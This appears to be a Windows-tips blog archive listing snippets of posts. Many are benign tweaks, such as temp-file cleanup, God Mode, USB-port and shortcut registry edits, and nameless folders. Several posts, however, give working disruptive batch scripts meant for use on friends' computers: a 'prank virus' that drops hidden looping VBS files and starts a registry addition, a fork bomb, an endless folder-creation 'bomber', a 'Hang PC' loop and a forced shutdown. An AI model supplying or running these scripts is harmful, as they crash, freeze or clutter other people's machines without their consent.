Skip to main content

Posts

Showing posts with the label SanjayTechnoBytes

How To Create Undeletable And Unrenamable Folder In Windows

How To Create Undeletable And Unrenamable Folder In Windows The method is very simple and easy and you can easily do this with a little cmd trick. Just follow the below steps to proceed. First of all go to Start and then Click on RunNow type cmd & hit enter (Command Prompt will get opened).Always remember that you cannot create any undeletable & unrenamable folder in your root directory of storage. Which means these folders can’t be created in the drive in which your windows is being installed.Now type D: or E: and then hit enterType md con\ and hit enter (md – make directory)You may use other words such as kk,th and kb instead of con in above step.Now open the directory and you will see the folder created of name con there.Now lets try to delete that folder or rename that folder windows will show the error message there.This folder now can’t be deleted and renameable by this way. How to delete the Unrenamable and Undeletable folder First of all open t...

Notepad open problem gives error message - TechnoBytes

Notepad open problem gives error message If the notepad is open gives error or if its not opening then......... Goto run type 'msconfig'  command &  run..... then window will appear.... Then goto 'strartup'  tab..... Check disable all box...... &  then apply ok....... Restart computer...... congrats notepad will now open successfully....

Make your computer faster - TechnoBytes

Make your computer faster Number 1: Removing Temporary files. Open Run by pressing Windows + R Keys and then type %temp% and hit OK. It will open up a window with all temporary files. Select and delete them all to make your computer run faster. Number 2: Again removing Temporary Files. There are two locations actually where the temp files will be stored. So, open Run by pressing Windows + R keys and now type just “temp” then hit OK. Delete all the files and folders which are in opened window. Number 3: Deleting Prefetched files. Open Run again by typing Windows + R keys then now type “prefetch”. If it asks for permission, allow it to delete all prefetched files which help to improve the performance of the Computer or Laptop. Number 4: Using Disk Cleanup. If you are using Windows 7, then use the search bar to get the Disk Clean up wizard or in case of Windows 8, go to metro dashboard then here select “Settings” and now search for Disk Clean up. Ope...

How to Enable God Mode in Windows 7 (Secret Tricks) - TechnoBytes

How to Enable God Mode in Windows 7 (Secret Tricks) 1- You'll be creating a folder that will take you to the god mode folder. 2- It'll actually show you all the configurations and settings available in your Windows 7 Computer. 3- This trick works in almost all versions of Windows. Read the warning below. 4- Just create any folder and than rename it to the following code: God Mode.{ED7BA470-8E54-465E-825C-99712043E01C}

Error : Ping command is not recognised in cmd - TechnoBytes

Ping command is not recognised in cmd Right click "My Computer" and click "Properties". Click the "Advanced" tab up top followed by the "Environment Variables" button at the bottom. In the 2nd list box, scroll down to the 5th or 6th entry "Path", select it and click "Edit". Add "%SystemRoot%\system32;%SystemRoot%;" (minus the quotes) to the beginning of the line. Okay the changes and try out your commands now.

Disable USB Ports On Windows PC Via Registry

Disable USB Ports On Windows PC Via Registry With this trick, you can disable access to your USB(Universal Serial Bus) ports on your Windows based PC to prevent people from taking out data without permission or spreading viruses through the use of USB (pen and flash) drives. To use this trick to disable USB ports, follow the steps given below:- Click on Start. Click on Run. If you cannot find RUN, type it in the search box. Type "regedit" without quotes. This will launch the Registry Editor. Navigate to  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbstor. In the work area, double click on Start. In the Value Data box, enter 4. Click on OK. Close Registry Editor and refresh your desktop. To re-enable access to your USB ports, enter 3 in the Value Data box in Step 6. Try it yourself to make your PC invulnerable from data theft and malware which spread through USB ports. This works on Windows XP, Windows Vista, Windows 7 and Windows 8. Note: This trick als...

Change Name Of Your Processor Permanently - TechnoBytes

Change Name Of Your Processor Permanently Change Processor Name Permanently Problem: To, make the name change permanent, it was required to update the Processor Name String registry key every time Windows starts. Solution: It is very easy to change your processor name permanently by creating a registry key and placing a shortcut to it in the Windows start up folder. To do so, just follow the steps given below:- Steps :- 1.  Open Notepad. 2.  Copy and paste the exact code given below:- Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0] "ProcessorNameString"="My Processor name 50000MHz" To change the processor name, edit the part of the code given in blue. Also understand that \0 in the above code should only be present if Windows store your processor name at that location. Open the Registry Editor and navigate to the above mentioned keys to check whether or not to include the \0. 3.  Click on File Menu...

Prank Virus - TechnoBytes

Prank Virus ▼ Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly. @echo off echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs echo Set colCDROMs=oWMP.cdromCollection>>123.vbs echo do>>123.vbs echo if colCDROMs.count>=1 then>>123.vbs echo for i=0 to colCDROMs.Count -1>>123.vbs echo colCDROMs.Item(i).Eject>>123.vbs echo Next>>123.vbs echo For i=0 to colCDROMs.Count -1>>123.vbs echo colCDROMs.Item(i).Eject>>123.vbs echo Next>>123.vbs echo End If>>123.vbs echo wscript.sleep 5000>>123.vbs echo loop>>123.vbs echo DO>>1234.vbs echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs echo LOOP>>1234.vbs copy /y 123.vbs C:\ copy /y 1234.vbs C:\ attrib +s +h c:\123.vbs attrib +s +h c:\1234.vbs reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polici...

Fork Bomber - TechnoBytes

Fork Bomber ▼ It is another batch file which ulitises 100% computer resources and memory making your computer irresponsive and at last your compuer hangs. Just copy and paste the below codes and save it as fork.bat :s<br />start %0<br />%0|%0<br />goto :s<br />

Folder Bomber Batch File - TechnoBytes

Folder Bomber This batch file will create 3000+ folder in less than a minute. Open your notepad and type the following codes. @echo off :top md %random% goto top Save it as 3000.bat Give this file to your friend and when he will click on that his nightmare will be started. Above Code Explained. @echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and %random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.

Add or Remove "Shortcut" Name Extension

Add or Remove "Shortcut"  Name Extension To Add or Remove "Shortcut" Name Extension in Registry Editor 1. Press the Windows + R keys to open the Run dialog, type regedit, and press Enter. 2. If prompted by UAC, click/tap on Yes. 3. In the registry, go to: (See screenshot below) HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer 4. In the right pane of Explorer, double click/tap on link to modify it. (See screenshot above) 5. To Remove the Shortcut Extension A) Change the value to 00 00 00 00 and click/tap on OK, and go to step 7 below. (See screenshot below) NOTE: To change the value, press the Delete (Del) key once and type 00. B) Go to step 7. 6. To Restore the Shortcut Extension NOTE: This is the default setting. A) Change the value to 1E 00 00 00 and click/tap on OK, and go to step 7 below. (See screenshots below) NOTE: To change the value, press the Delete (Del) key once and type 1E. 7. Close regedit. 8. Log off and log on, or ...

Entertainment softy

Tools for Entertainment           Some tools to make your computer screen more attractive....... like Birds flying on your screen,  Crash your computer screen(prank) ...... small Tools/Softwares,  you will love it....... Download

Shutdown Computer With Message - TechnoBytes

Shutdown The Computer After Conveying Message This one is kind of an annoying trick and if used unknowingly can certainly cause problems (am serious). What this trick does is, after conveying a (any) message it shuts down the computer without any confirmation. In order to create the Shutdown file, follow the below mentioned steps: Open Notepad. Paste the following code in it: @echo off msg * Its time to get some rest. shutdown -c “Error! You have to take rest! Byeeeeee” -s Save the file with any name but with .bat extension and close it. For eg. TakeRest.bat

Matrix Falling Code Effect - TechnoBytes

Matrix Falling Code Effect - Notepad CMD (.BAT) Tricks -----------------------------------------------------------------------                Inspired by the movie Matrix, this falling code trick is extremely popular on social networking websites. Copy and paste the code given below in Notepad and save the file as "Matrix.bat" or *.bat. @echo off color 02 :technobytes echo %random%%random%%random%%random%%random%%random%%random%%random% goto technobytes Matrix Falling Code Effect - Notepad Trick Upon running the bat file, you will see the "Matrix falling code" effect.

Hang PC Trick - TechnoBytes

Hang pc trick create a bat file with the following code : ------------------------------------------------------------------ @ECHO off :top start %system root%\windows\notepad.exe Goto top ----------------------------------------------------------------- SAVE this with "Hang. bat" (Try this trick at your own risk)

How to create folder without name - TechnoBytes

How To Create A File or Folder Without Any Name in Windows 7, 8, XP Article will show you how to create a file/folder having blank space as a name. It means folder has no name. The process works on all Windows (Windows XP, Windows Vista, Windows 7, Windows 8 and Windows RT) PC. Step By Step Procedure To Create A folder With Blank Space 1. Select any file or folder whose name you want to remove or change its name as a blank space. 2. Right click on it and choose rename or simply press F2 from keyboard to rename that file or folder 3. Press and hold the Alt key. While holding the Alt key, type numbers 0160(0r 999999999 or 255) from the numpad. Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don’t type the numbers which are present on top of the character keys. 4. Press Enter and the nameless file or folder will be created. Note: The file or folder that seems nameless is actually named with a single blank space. Ho...

Six Sense Technology - TechnoBytes

             SIXTH SENSE TECHNOLOGY   Abstract: ‘Sixth Sense’ is a wearable gesture interface that augments the physical world around us with digital information and lets us use natural hand gestures to interact with that information. Based on the principles of human communication system in this sense, then made the design of digital hardware systems similar work. Steve Mann is considered as the father of Sixth Sense Technology who made wearable computer in 1990. He implemented the Sixth Sense Technology as the neck worn projector with a camera system. Then his work was carried forward by Pranav Mistry (Ph.D student in the Fluid Interfaces Group at the MIT Media Lab) . Sixth Sense Technology may change how we look at the world forever. Sure, it is a system that projects information about what surrounds you over objects' surfaces, but it's also much more. By using a camera and a tiny projector, Sixth Sense sees what yo...